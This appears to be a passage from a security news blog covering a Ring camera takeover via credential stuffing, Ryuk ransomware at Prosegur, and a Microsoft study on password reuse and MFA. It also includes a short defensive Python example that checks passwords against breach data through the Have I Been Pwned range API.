A video showing a hacker talking to a young girl in her bedroom via her family's Ring camera was shared on social media. The hacker tells the young girl: "It's Santa. It's your best friend." The Motherboard website reported hackers were offering software that makes it easier to break into such devices. Ring owner Amazon said the incident was not related to a security breach, but that the compromise was down to credential stuffing, stating: "Due to the fact that customers often use the same username and password for their various accounts and subscriptions, bad actors often re-use credentials stolen or leaked from one service on other services."


Ransomware continued to plague multiple industries throughout 2019, and even security companies aren't immune: Spanish security company Prosegur was reported to have been taken down by the Ryuk ransomware.

Finally, a Microsoft Security Intelligence Report concluded what all security professionals already know well: implementing Multi-Factor Authentication (MFA) would have thwarted the vast majority of identity attacks. The Microsoft study, which examined nearly 30 million users and their passwords, found that reusing passwords across multiple account-based services is still common; password reuse and slight modifications were observed for 52% of users. The same study also found that 30% of the modified passwords and all of the reused passwords can be cracked within just 10 guesses. This behaviour puts users at risk of a breach replay attack: once a threat actor gets hold of spilled credentials, or credentials in the wild, they can try the same credentials on different service accounts to see if there is a match.
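
As an aside, the breach replay risk described above is straightforward to check for on the defensive side. The minimal Python sketch below is my own illustration rather than anything from the Microsoft report: it tests whether a password already appears in publicly known breach data using the Have I Been Pwned "Pwned Passwords" range API. Only the first five characters of the password's SHA-1 hash are ever sent over the network, and the example password shown is hypothetical.

    import hashlib
    import urllib.request

    def breach_count(password: str) -> int:
        """Return how many times 'password' appears in known breach corpora,
        via the Have I Been Pwned k-anonymity range API. Only the first five
        hex characters of the SHA-1 hash ever leave the machine."""
        sha1 = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
        prefix, suffix = sha1[:5], sha1[5:]
        url = "https://api.pwnedpasswords.com/range/" + prefix
        with urllib.request.urlopen(url) as resp:
            body = resp.read().decode("utf-8")
        # The response is one "HASH-SUFFIX:COUNT" pair per line for the whole prefix bucket.
        for line in body.splitlines():
            candidate, _, count = line.partition(":")
            if candidate.strip() == suffix:
                return int(count)
        return 0

    if __name__ == "__main__":
        pw = "Winter2019!"  # hypothetical example password
        hits = breach_count(pw)
        if hits:
            print("Seen", hits, "times in breach data - assume it will be replayed.")
        else:
            print("Not found in known breaches - still pair it with MFA.")

Any password that comes back with a non-zero count should be treated as already sitting in attackers' replay lists and retired, ideally alongside switching on MFA.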

BLOG
NEWS 
VULNERABILITIES AND SECURITY UPDATES
AWARENESS, EDUCATION AND THREAT INTELLIGENCE